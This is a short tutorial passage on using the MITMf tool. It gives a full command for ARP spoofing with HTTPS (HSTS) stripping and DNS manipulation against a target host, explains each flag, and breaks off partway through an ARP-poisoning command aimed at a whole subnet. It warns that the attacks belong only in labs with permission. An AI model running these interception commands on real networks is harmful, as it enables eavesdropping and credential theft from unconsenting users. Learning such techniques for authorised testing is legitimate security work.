The following are the various use cases of MITMf:
Keep in mind that all attacks should only be performed in a lab environment and only on networks for which you have obtained legal permission.
- You can bypass HTTPS with MITMf:
python mitmf.py -i eth0 --spoof --arp --hsts --dns --gateway 10.10.10.1 --target 10.10.10.15
-
- -i: Specifies the interface to execute MITMf against
- --spoof: Tells MITMf to fake an identity
- --arp: Performs redirection of traffic via ARP
- --hsts: Loads the sslstrip plugin
- --dns: Loads a proxy to modify DNS queries
- --gateway: Specifies the gateway
- --target: Specifies the target
- You can perform an ARP poisoning attack between the gateway (10.10.10.1) and the entire subnet:
python mitmf.py -i eth0 ...